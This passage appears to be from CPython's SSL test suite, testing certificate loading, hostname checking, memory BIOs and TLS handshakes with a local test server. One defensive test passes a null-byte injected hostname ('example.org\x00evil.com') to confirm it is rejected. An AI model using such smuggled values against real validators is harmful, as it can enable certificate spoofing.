ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = b"".join((cacert_der, neuronio_der))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# error cases
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertRaises(TypeError, ctx.load_verify_locations, cadata=object)
with self.assertRaisesRegex(ssl.SSLError, "no start line"):
ctx.load_verify_locations(cadata="broken")
with self.assertRaisesRegex(ssl.SSLError, "not enough data"):
ctx.load_verify_locations(cadata=b"broken")
def test_load_dh_params(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_dh_params(DHFILE)
if os.name != 'nt':
ctx.load_dh_params(BYTES_DHFILE)
self.assertRaises(TypeError, ctx.load_dh_params)
self.assertRaises(TypeError, ctx.load_dh_params, None)
with self.assertRaises(FileNotFoundError) as cm:
ctx.load_dh_params(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
def test_session_stats(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.session_stats(), {
'number': 0,
'connect': 0,
'connect_good': 0,
'connect_renegotiate': 0,
'accept': 0,
'accept_good': 0,
'accept_renegotiate': 0,
'hits': 0,
'misses': 0,
'timeouts': 0,
'cache_full': 0,
})
def test_set_default_verify_paths(self):
# There's not much we can do to test that it acts as expected,
# so just check it doesn't crash or raise an exception.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_default_verify_paths()
@unittest.skipUnless(ssl.HAS_ECDH, "ECDH disabled on this OpenSSL build")
def test_set_ecdh_curve(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.set_ecdh_curve("prime256v1")
ctx.set_ecdh_curve(b"prime256v1")
self.assertRaises(TypeError, ctx.set_ecdh_curve)
self.assertRaises(TypeError, ctx.set_ecdh_curve, None)
self.assertRaises(ValueError, ctx.set_ecdh_curve, "foo")
self.assertRaises(ValueError, ctx.set_ecdh_curve, b"foo")
@needs_sni
def test_sni_callback(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# set_servername_callback expects a callable, or None
self.assertRaises(TypeError, ctx.set_servername_callback)
self.assertRaises(TypeError, ctx.set_servername_callback, 4)
self.assertRaises(TypeError, ctx.set_servername_callback, "")
self.assertRaises(TypeError, ctx.set_servername_callback, ctx)
def dummycallback(sock, servername, ctx):
pass
ctx.set_servername_callback(None)
ctx.set_servername_callback(dummycallback)
@needs_sni
def test_sni_callback_refcycle(self):
# Reference cycles through the servername callback are detected
# and cleared.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
def dummycallback(sock, servername, ctx, cycle=ctx):
pass
ctx.set_servername_callback(dummycallback)
wr = weakref.ref(ctx)
del ctx, dummycallback
gc.collect()
self.assertIs(wr(), None)
def test_cert_store_stats(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_cert_chain(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 1})
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 1, 'crl': 0, 'x509': 2})
def test_get_ca_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.get_ca_certs(), [])
# CERTFILE is not flagged as X509v3 Basic Constraints: CA:TRUE
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.get_ca_certs(), [])
# but CAFILE_CACERT is a CA cert
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.get_ca_certs(),
[{'issuer': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', '[email protected]'),)),
'notAfter': asn1time('Mar 29 12:29:49 2033 GMT'),
'notBefore': asn1time('Mar 30 12:29:49 2003 GMT'),
'serialNumber': '00',
'crlDistributionPoints': ('https://www.cacert.org/revoke.crl',),
'subject': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', '[email protected]'),)),
'version': 3}])
with open(CAFILE_CACERT) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
self.assertEqual(ctx.get_ca_certs(True), [der])
def test_load_default_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs(ssl.Purpose.SERVER_AUTH)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs(ssl.Purpose.CLIENT_AUTH)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertRaises(TypeError, ctx.load_default_certs, None)
self.assertRaises(TypeError, ctx.load_default_certs, 'SERVER_AUTH')
@unittest.skipIf(sys.platform == "win32", "not-Windows specific")
@unittest.skipIf(IS_LIBRESSL, "LibreSSL doesn't support env vars")
def test_load_default_certs_env(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
self.assertEqual(ctx.cert_store_stats(), {"crl": 0, "x509": 1, "x509_ca": 0})
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
@unittest.skipIf(hasattr(sys, "gettotalrefcount"), "Debug build does not share environment between CRTs")
def test_load_default_certs_env_windows(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs()
stats = ctx.cert_store_stats()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
stats["x509"] += 1
self.assertEqual(ctx.cert_store_stats(), stats)
def _assert_context_options(self, ctx):
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
if OP_NO_COMPRESSION != 0:
self.assertEqual(ctx.options & OP_NO_COMPRESSION,
OP_NO_COMPRESSION)
if OP_SINGLE_DH_USE != 0:
self.assertEqual(ctx.options & OP_SINGLE_DH_USE,
OP_SINGLE_DH_USE)
if OP_SINGLE_ECDH_USE != 0:
self.assertEqual(ctx.options & OP_SINGLE_ECDH_USE,
OP_SINGLE_ECDH_USE)
if OP_CIPHER_SERVER_PREFERENCE != 0:
self.assertEqual(ctx.options & OP_CIPHER_SERVER_PREFERENCE,
OP_CIPHER_SERVER_PREFERENCE)
def test_create_default_context(self):
ctx = ssl.create_default_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self._assert_context_options(ctx)
with open(SIGNING_CA) as f:
cadata = f.read()
ctx = ssl.create_default_context(cafile=SIGNING_CA, capath=CAPATH,
cadata=cadata)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self._assert_context_options(ctx)
ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
def test__create_stdlib_context(self):
ctx = ssl._create_stdlib_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertFalse(ctx.check_hostname)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1,
cert_reqs=ssl.CERT_REQUIRED,
check_hostname=True)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(purpose=ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
def test_check_hostname(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
# Auto set CERT_REQUIRED
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
# Changing verify_mode does not affect check_hostname
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
# Auto set
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_OPTIONAL
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
# keep CERT_OPTIONAL
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
# Cannot set CERT_NONE with check_hostname enabled
with self.assertRaises(ValueError):
ctx.verify_mode = ssl.CERT_NONE
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
def test_context_client_server(self):
# PROTOCOL_TLS_CLIENT has sane defaults
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
# PROTOCOL_TLS_SERVER has different but also sane defaults
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
def test_context_custom_class(self):
class MySSLSocket(ssl.SSLSocket):
pass
class MySSLObject(ssl.SSLObject):
pass
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.sslsocket_class = MySSLSocket
ctx.sslobject_class = MySSLObject
with ctx.wrap_socket(socket.socket(), server_side=True) as sock:
self.assertIsInstance(sock, MySSLSocket)
obj = ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO())
self.assertIsInstance(obj, MySSLObject)
class SSLErrorTests(unittest.TestCase):
def test_str(self):
        # The str() of an SSLError doesn't include the errno
e = ssl.SSLError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
# Same for a subclass
e = ssl.SSLZeroReturnError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
def test_lib_reason(self):
# Test the library and reason attributes
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
self.assertEqual(cm.exception.library, 'PEM')
self.assertEqual(cm.exception.reason, 'NO_START_LINE')
s = str(cm.exception)
self.assertTrue(s.startswith("[PEM: NO_START_LINE] no start line"), s)
def test_subclass(self):
# Check that the appropriate SSLError subclass is raised
# (this only tests one of them)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
with socket.create_server(("127.0.0.1", 0)) as s:
c = socket.create_connection(s.getsockname())
c.setblocking(False)
with ctx.wrap_socket(c, False, do_handshake_on_connect=False) as c:
with self.assertRaises(ssl.SSLWantReadError) as cm:
c.do_handshake()
s = str(cm.exception)
self.assertTrue(s.startswith("The operation did not complete (read)"), s)
# For compatibility
self.assertEqual(cm.exception.errno, ssl.SSL_ERROR_WANT_READ)
def test_bad_server_hostname(self):
ctx = ssl.create_default_context()
with self.assertRaises(ValueError):
ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(),
server_hostname="")
with self.assertRaises(ValueError):
ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(),
server_hostname=".example.org")
with self.assertRaises(TypeError):
ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(),
server_hostname="example.org\x00evil.com")
class MemoryBIOTests(unittest.TestCase):
def test_read_write(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
self.assertEqual(bio.read(), b'')
bio.write(b'foo')
bio.write(b'bar')
self.assertEqual(bio.read(), b'foobar')
self.assertEqual(bio.read(), b'')
bio.write(b'baz')
self.assertEqual(bio.read(2), b'ba')
self.assertEqual(bio.read(1), b'z')
self.assertEqual(bio.read(1), b'')
def test_eof(self):
bio = ssl.MemoryBIO()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertFalse(bio.eof)
bio.write(b'foo')
self.assertFalse(bio.eof)
bio.write_eof()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(2), b'fo')
self.assertFalse(bio.eof)
self.assertEqual(bio.read(1), b'o')
self.assertTrue(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertTrue(bio.eof)
def test_pending(self):
bio = ssl.MemoryBIO()
self.assertEqual(bio.pending, 0)
bio.write(b'foo')
self.assertEqual(bio.pending, 3)
for i in range(3):
bio.read(1)
self.assertEqual(bio.pending, 3-i-1)
for i in range(3):
bio.write(b'x')
self.assertEqual(bio.pending, i+1)
bio.read()
self.assertEqual(bio.pending, 0)
def test_buffer_types(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
bio.write(bytearray(b'bar'))
self.assertEqual(bio.read(), b'bar')
bio.write(memoryview(b'baz'))
self.assertEqual(bio.read(), b'baz')
def test_error_types(self):
bio = ssl.MemoryBIO()
self.assertRaises(TypeError, bio.write, 'foo')
self.assertRaises(TypeError, bio.write, None)
self.assertRaises(TypeError, bio.write, True)
self.assertRaises(TypeError, bio.write, 1)
class SSLObjectTests(unittest.TestCase):
def test_private_init(self):
bio = ssl.MemoryBIO()
with self.assertRaisesRegex(TypeError, "public constructor"):
ssl.SSLObject(bio, bio)
def test_unwrap(self):
client_ctx, server_ctx, hostname = testing_context()
c_in = ssl.MemoryBIO()
c_out = ssl.MemoryBIO()
s_in = ssl.MemoryBIO()
s_out = ssl.MemoryBIO()
client = client_ctx.wrap_bio(c_in, c_out, server_hostname=hostname)
server = server_ctx.wrap_bio(s_in, s_out, server_side=True)
# Loop on the handshake for a bit to get it settled
for _ in range(5):
try:
client.do_handshake()
except ssl.SSLWantReadError:
pass
if c_out.pending:
s_in.write(c_out.read())
try:
server.do_handshake()
except ssl.SSLWantReadError:
pass
if s_out.pending:
c_in.write(s_out.read())
# Now the handshakes should be complete (don't raise WantReadError)
client.do_handshake()
server.do_handshake()
# Now if we unwrap one side unilaterally, it should send close-notify
# and raise WantReadError:
with self.assertRaises(ssl.SSLWantReadError):
client.unwrap()
# But server.unwrap() does not raise, because it reads the client's
# close-notify:
s_in.write(c_out.read())
server.unwrap()
# And now that the client gets the server's close-notify, it doesn't
# raise either.
c_in.write(s_out.read())
client.unwrap()
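# test_unwrap above relies on a fixed number of loop iterations being enough
# for the handshake to settle.  The sketch below spells out the general
# memory-BIO pumping pattern (illustrative only; not called by any test):
# retry both sides on SSLWantReadError and shuttle pending bytes between the
# paired BIOs until both handshakes complete.
def _bio_handshake_sketch(client, c_in, c_out, server, s_in, s_out,
                          max_rounds=10):
    for _ in range(max_rounds):
        done = True
        for side in (client, server):
            try:
                side.do_handshake()
            except ssl.SSLWantReadError:
                done = False
        # move any queued bytes across the simulated wire, both directions
        if c_out.pending:
            s_in.write(c_out.read())
        if s_out.pending:
            c_in.write(s_out.read())
        if done:
            return
    raise RuntimeError('handshake did not complete')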
class SimpleBackgroundTests(unittest.TestCase):
"""Tests that connect to a simple server running in the background"""
def setUp(self):
server = ThreadedEchoServer(SIGNED_CERTFILE)
self.server_addr = (HOST, server.port)
server.__enter__()
self.addCleanup(server.__exit__, None, None, None)
def test_connect(self):
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE) as s:
s.connect(self.server_addr)
self.assertEqual({}, s.getpeercert())
self.assertFalse(s.server_side)
# this should succeed because we specify the root cert
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA) as s:
s.connect(self.server_addr)
self.assertTrue(s.getpeercert())
self.assertFalse(s.server_side)
def test_connect_fail(self):
# This should fail because we have no verification certs. Connection
# failure crashes ThreadedEchoServer, so run this in an independent
# test method.
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.addCleanup(s.close)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, self.server_addr)
def test_connect_ex(self):
# Issue #11326: check connect_ex() implementation
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA)
self.addCleanup(s.close)
self.assertEqual(0, s.connect_ex(self.server_addr))
self.assertTrue(s.getpeercert())
def test_non_blocking_connect_ex(self):
# Issue #11326: non-blocking connect_ex() should allow handshake
# to proceed after the socket gets ready.
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA,
do_handshake_on_connect=False)
self.addCleanup(s.close)
s.setblocking(False)
rc = s.connect_ex(self.server_addr)
# EWOULDBLOCK under Windows, EINPROGRESS elsewhere
self.assertIn(rc, (0, errno.EINPROGRESS, errno.EWOULDBLOCK))
# Wait for connect to finish
select.select([], [s], [], 5.0)
# Non-blocking handshake
while True:
try:
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [], 5.0)
except ssl.SSLWantWriteError:
select.select([], [s], [], 5.0)
# SSL established
self.assertTrue(s.getpeercert())
def test_connect_with_context(self):
# Same as test_connect, but with a separately created context
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
self.assertEqual({}, s.getpeercert())
# Same with a server hostname
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname="dummy") as s:
s.connect(self.server_addr)
ctx.verify_mode = ssl.CERT_REQUIRED
# This should succeed because we specify the root cert
ctx.load_verify_locations(SIGNING_CA)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
def test_connect_with_context_fail(self):
# This should fail because we have no verification certs. Connection
# failure crashes ThreadedEchoServer, so run this in an independent
# test method.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_REQUIRED
s = ctx.wrap_socket(socket.socket(socket.AF_INET))
self.addCleanup(s.close)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, self.server_addr)
def test_connect_capath(self):
# Verify server certificates using the `capath` argument
        # NOTE: the subject hashing algorithm changed between
        # OpenSSL 0.9.8n and 1.0.0; as a result, the capath directory must
        # contain both versions of each certificate (same content, different
        # filename) for this test to be portable across OpenSSL releases.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=CAPATH)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
# Same with a bytes `capath` argument
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(capath=BYTES_CAPATH)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
def test_connect_cadata(self):
with open(SIGNING_CA) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(cadata=pem)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
# same with DER
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_verify_locations(cadata=der)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
@unittest.skipIf(os.name == "nt", "Can't use a socket as a file under Windows")
def test_makefile_close(self):
# Issue #5238: creating a file-like object with makefile() shouldn't
# delay closing the underlying "real socket" (here tested with its
# file descriptor, hence skipping the test under Windows).
ss = test_wrap_socket(socket.socket(socket.AF_INET))
ss.connect(self.server_addr)
fd = ss.fileno()
f = ss.makefile()
f.close()
# The fd is still open
os.read(fd, 0)
# Closing the SSL socket should close the fd too
ss.close()
gc.collect()
with self.assertRaises(OSError) as e:
os.read(fd, 0)
self.assertEqual(e.exception.errno, errno.EBADF)
def test_non_blocking_handshake(self):
s = socket.socket(socket.AF_INET)
s.connect(self.server_addr)
s.setblocking(False)
s = test_wrap_socket(s,
cert_reqs=ssl.CERT_NONE,
do_handshake_on_connect=False)
self.addCleanup(s.close)
count = 0
while True:
try:
count += 1
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [])
except ssl.SSLWantWriteError:
select.select([], [s], [])
if support.verbose:
sys.stdout.write("\nNeeded %d calls to do_handshake() to establish session.\n" % count)
def test_get_server_certificate(self):
_test_get_server_certificate(self, *self.server_addr, cert=SIGNING_CA)
def test_get_server_certificate_fail(self):
# Connection failure crashes ThreadedEchoServer, so run this in an
# independent test method
_test_get_server_certificate_fail(self, *self.server_addr)
def test_ciphers(self):
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="ALL") as s:
s.connect(self.server_addr)
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="DEFAULT") as s:
s.connect(self.server_addr)
# Error checking can happen at instantiation or when connecting
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
with socket.socket(socket.AF_INET) as sock:
s = test_wrap_socket(sock,
cert_reqs=ssl.CERT_NONE, ciphers="^$:,;?*'dorothyx")
s.connect(self.server_addr)
def test_get_ca_certs_capath(self):
# capath certs are loaded on request
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(capath=CAPATH)
self.assertEqual(ctx.get_ca_certs(), [])
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname='localhost') as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
self.assertEqual(len(ctx.get_ca_certs()), 1)
@needs_sni
def test_context_setget(self):
# Check that the context of a connected socket can be replaced.
ctx1 = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx1.load_verify_locations(capath=CAPATH)
ctx2 = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx2.load_verify_locations(capath=CAPATH)
s = socket.socket(socket.AF_INET)
with ctx1.wrap_socket(s, server_hostname='localhost') as ss:
ss.connect(self.server_addr)
self.assertIs(ss.context, ctx1)
self.assertIs(ss._sslobj.context, ctx1)
ss.context = ctx2
self.assertIs(ss.context, ctx2)
self.assertIs(ss._sslobj.context, ctx2)
def ssl_io_loop(self, sock, incoming, outgoing, func, *args, **kwargs):
        # A simple I/O loop. Call func(*args) and, depending on the error we
        # get (WANT_READ or WANT_WRITE), move data between the socket and
        # the BIOs.
timeout = kwargs.get('timeout', 10)
deadline = time.monotonic() + timeout
count = 0
while True:
if time.monotonic() > deadline:
self.fail("timeout")
errno = None
count += 1
try:
ret = func(*args)
except ssl.SSLError as e:
if e.errno not in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
raise
errno = e.errno
# Get any data from the outgoing BIO irrespective of any error, and
# send it to the socket.
buf = outgoing.read()
sock.sendall(buf)
# If there's no error, we're done. For WANT_READ, we need to get
# data from the socket and put it in the incoming BIO.
if errno is None:
break
elif errno == ssl.SSL_ERROR_WANT_READ:
buf = sock.recv(32768)
if buf:
incoming.write(buf)
else:
incoming.write_eof()
if support.verbose:
sys.stdout.write("Needed %d calls to complete %s().\n"
% (count, func.__name__))
return ret
def test_bio_handshake(self):
sock = socket.socket(socket.AF_INET)
self.addCleanup(sock.close)
sock.connect(self.server_addr)
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.load_verify_locations(SIGNING_CA)
sslobj = ctx.wrap_bio(incoming, outgoing, False,
SIGNED_CERTFILE_HOSTNAME)
self.assertIs(sslobj._sslobj.owner, sslobj)
self.assertIsNone(sslobj.cipher())
self.assertIsNone(sslobj.version())
self.assertIsNotNone(sslobj.shared_ciphers())
self.assertRaises(ValueError, sslobj.getpeercert)
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertIsNone(sslobj.get_channel_binding('tls-unique'))
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
self.assertTrue(sslobj.cipher())
self.assertIsNotNone(sslobj.shared_ciphers())
self.assertIsNotNone(sslobj.version())
self.assertTrue(sslobj.getpeercert())
if 'tls-unique' in ssl.CHANNEL_BINDING_TYPES:
self.assertTrue(sslobj.get_channel_binding('tls-unique'))
try:
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
except ssl.SSLSyscallError:
# If the server shuts down the TCP connection without sending a
# secure shutdown message, this is reported as SSL_ERROR_SYSCALL
pass
self.assertRaises(ssl.SSLError, sslobj.write, b'foo')
def test_bio_read_write_data(self):
sock = socket.socket(socket.AF_INET)
self.addCleanup(sock.close)
sock.connect(self.server_addr)
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
ctx.verify_mode = ssl.CERT_NONE
sslobj = ctx.wrap_bio(incoming, outgoing, False)
self.ssl_io_loop(sock, incoming, outgoing, sslobj.do_handshake)
req = b'FOO\n'
self.ssl_io_loop(sock, incoming, outgoing, sslobj.write, req)
buf = self.ssl_io_loop(sock, incoming, outgoing, sslobj.read, 1024)
self.assertEqual(buf, b'foo\n')
self.ssl_io_loop(sock, incoming, outgoing, sslobj.unwrap)
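# Several tests above hand-roll the same non-blocking handshake pattern; a
# generic sketch of it (illustrative only; not called by the tests):
def _nonblocking_handshake_sketch(sock, timeout=5.0):
    # Retry do_handshake() until it stops reporting WANT_READ/WANT_WRITE,
    # waiting for socket readiness with select() in between.
    while True:
        try:
            sock.do_handshake()
            return
        except ssl.SSLWantReadError:
            select.select([sock], [], [], timeout)
        except ssl.SSLWantWriteError:
            select.select([], [sock], [], timeout)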
class NetworkedTests(unittest.TestCase):
def test_timeout_connect_ex(self):
# Issue #12065: on a timeout, connect_ex() should return the original
# errno (mimicking the behaviour of non-SSL sockets).
with support.transient_internet(REMOTE_HOST):
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
do_handshake_on_connect=False)
self.addCleanup(s.close)
s.settimeout(0.0000001)
rc = s.connect_ex((REMOTE_HOST, 443))
if rc == 0:
self.skipTest("REMOTE_HOST responded too quickly")
self.assertIn(rc, (errno.EAGAIN, errno.EWOULDBLOCK))
@unittest.skipUnless(support.IPV6_ENABLED, 'Needs IPv6')
def test_get_server_certificate_ipv6(self):
with support.transient_internet('ipv6.google.com'):
_test_get_server_certificate(self, 'ipv6.google.com', 443)
_test_get_server_certificate_fail(self, 'ipv6.google.com', 443)
def _test_get_server_certificate(test, host, port, cert=None):
pem = ssl.get_server_certificate((host, port))
if not pem:
test.fail("No server certificate on %s:%s!" % (host, port))
pem = ssl.get_server_certificate((host, port), ca_certs=cert)
if not pem:
test.fail("No server certificate on %s:%s!" % (host, port))
if support.verbose:
sys.stdout.write("\nVerified certificate for %s:%s is\n%s\n" % (host, port ,pem))
def _test_get_server_certificate_fail(test, host, port):
try:
pem = ssl.get_server_certificate((host, port), ca_certs=CERTFILE)
except ssl.SSLError as x:
        # should fail
if support.verbose:
sys.stdout.write("%s\n" % x)
else:
test.fail("Got server certificate %s for %s:%s!" % (pem, host, port))
from test.ssl_servers import make_https_server
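# ThreadedEchoServer layers a small line-oriented command protocol on top of
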